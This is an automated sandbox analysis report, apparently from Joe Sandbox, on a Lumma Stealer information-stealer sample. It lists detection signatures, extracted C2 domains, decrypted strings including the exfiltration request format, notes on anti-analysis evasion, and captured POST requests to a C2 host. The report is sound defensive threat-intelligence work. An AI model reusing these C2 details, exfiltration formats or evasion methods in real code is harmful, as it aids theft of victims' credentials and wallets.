Windows Analysis Report
3vLKNycnrz.exe

Overview

General Information

Sample name: 3vLKNycnrz.exe (renamed because original name is a hash value)
Original sample name: 78b4d3e1df367155161b0ca24d08b157.exe
Analysis ID: 1581190
MD5: 78b4d3e1df367155161b0ca24d08b157
SHA1: e0b63eb3c6858c7cb8e3754b67264b8a861b1d86
SHA256: 10c9f5d51b36a62a32560a1e9912a28c781f9723fa23c2f778a86e8e94aef2fb
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3vLKNycnrz.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\3vLKNycnrz.exe" MD5: 78B4D3E1DF367155161B0CA24D08B157)
    • 3vLKNycnrz.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\3vLKNycnrz.exe" MD5: 78B4D3E1DF367155161B0CA24D08B157)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["sordid-snaked.cyou", "effecterectz.xyz", "awake-weaves.cyou", "debonairnukk.xyz", "peelyitemsn.click", "immureprech.biz", "deafeninggeh.biz", "diffuculttan.xyz", "wrathful-jammy.cyou"], "Build id": "Lb9dkQ--Jora"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000002.1430982949.0000000006240000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
Process Memory Space: 3vLKNycnrz.exe PID: 7360 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
Process Memory Space: 3vLKNycnrz.exe PID: 7360 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

Source | Rule | Description | Author
0.2.3vLKNycnrz.exe.6240000.8.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.3vLKNycnrz.exe.47d16e0.0.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.3vLKNycnrz.exe.45cf2a0.5.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:13:07.399283+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 104.21.62.151 | 443 | TCP
2024-12-27T08:13:09.017586+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 104.21.62.151 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:13:08.134997+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.62.151 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:13:08.134997+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.62.151 | 443 | TCP

                    AV Detection

Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["sordid-snaked.cyou", "effecterectz.xyz", "awake-weaves.cyou", "debonairnukk.xyz", "peelyitemsn.click", "immureprech.biz", "deafeninggeh.biz", "diffuculttan.xyz", "wrathful-jammy.cyou"], "Build id": "Lb9dkQ--Jora"}
Source: 3vLKNycnrz.exe | ReversingLabs: Detection: 52%
Source: 3vLKNycnrz.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 3vLKNycnrz.exe | Joe Sandbox ML: detected
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: peelyitemsn.click
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Lb9dkQ--Jora
Source: 3vLKNycnrz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.62.151:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: 3vLKNycnrz.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+499B7F50h] | 2_2_0043A320
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h | 2_2_0043CCE0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edx, dword ptr [ebp-1Ch] | 2_2_0040BD61
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-17h] | 2_2_00427040
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx eax, byte ptr [edi+ecx] | 2_2_0040D076
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 2_2_00429820
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edx, eax | 2_2_004230D0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_004230D0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov esi, dword ptr [ebp-00000084h] | 2_2_004230D0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [edi], ax | 2_2_0043A8FB
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then xor eax, eax | 2_2_0041709A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_0043D8A0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041895F
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041895F
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041895F
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_00428160
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx-01EDEA17h] | 2_2_0042A96A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042A972
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx-01EDEA17h] | 2_2_0042A972
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [ebx+eax+2C9B826Eh] | 2_2_0040D1C7
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_0040D1C7
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+eax-04h] | 2_2_0041F990
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then jmp eax | 2_2_0041CA02
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then jmp eax | 2_2_0041CA19
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi-403FDF06h] | 2_2_00408230
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h] | 2_2_004212C0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh | 2_2_0040E2CF
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07C7E146h] | 2_2_004162D6
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [esi], cx | 2_2_004142E0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00432A90
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 71B3F069h | 2_2_0043CA90
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h | 2_2_00439340
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+07C7DE9Eh] | 2_2_00439340
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], A2347758h | 2_2_00439340
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_00429360
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], 5E874B5Fh | 2_2_00438B00
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then push edi | 2_2_004263C1
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] | 2_2_0043B3E5
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edx, ecx | 2_2_004223EF
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edx, eax | 2_2_00423386
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_00423386
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+07C7DE9Eh] | 2_2_0040E39C
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edi, dword ptr [esp+44h] | 2_2_00427C3A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] | 2_2_0042843A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+07C7DE9Eh] | 2_2_0040E39C
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+526FD95Bh] | 2_2_00435CA0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh | 2_2_0040D555
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edi, ecx | 2_2_00422D70
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edx, eax | 2_2_00422D70
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_00422D70
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00428D00
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then jmp edx | 2_2_0043BD10
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then jmp eax | 2_2_0040A539
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_00415538
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [esp+esi-5Eh] | 2_2_004365C0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edx, eax | 2_2_0041C5E0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [edi], ax | 2_2_0041C5E0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 2_2_00414DB0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+06h] | 2_2_00408E70
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6592EC84h] | 2_2_00426608
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh | 2_2_0043CE10
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then lea ecx, dword ptr [eax-67528DC7h] | 2_2_00426E19
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+07C7DEA2h] | 2_2_00419620
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [edx], ax | 2_2_0040C6E5
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+55636BF6h] | 2_2_0040C6E5
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_00429EF8
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then push edi | 2_2_0040DE8A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh | 2_2_00438EB0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh | 2_2_0040CF45
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], E785F9BAh | 2_2_00438F60
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-62h] | 2_2_00414713
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov edi, dword ptr [esp+08h] | 2_2_00414713
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov eax, 00000001h | 2_2_00414713
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041B7C6
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov esi, edx | 2_2_0042B7AD
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then mov ecx, eax | 2_2_0042B7AD
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 705FAB68h | 2_2_0040D7B4
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ecx+07C7DE9Eh] | 2_2_0040D7B4
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh | 2_2_0040D7B4

                    Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.62.151:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.62.151:443
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: Malware configuration extractor | URLs: peelyitemsn.click
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.62.151:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.62.151:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: peelyitemsn.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: peelyitemsn.click
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: peelyitemsn.click
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peelyitemsn.click/
Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peelyitemsn.click/.
Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peelyitemsn.click/C
Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000002.00000002.1443006164.00000000013FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peelyitemsn.click/api
Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peelyitemsn.click/api6
Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | HTTPS traffic detected: 104.21.62.151:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00430740 OpenClipboard, GetClipboardData, GlobalLock, GetWindowLongW, GlobalUnlock, CloseClipboard
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00430740 OpenClipboard, GetClipboardData, GlobalLock, GetWindowLongW, GlobalUnlock, CloseClipboard
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_03292B30 NtQueryInformationProcess
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_03292B29 NtQueryInformationProcess
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_032975F0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_03293A28
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_0609A678
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06099430
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_0609BFDB
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06095659
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06095668
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_0609A66A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06095667
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06095081
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_060950AF
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_060950C0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06095BEA
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06095BF8
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06C8E758
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06C70040
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06C70007
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0040A970
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0040CAAA
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00408620
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0040B63E
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00422040
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00408850
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00436850
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00416856
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0043C060
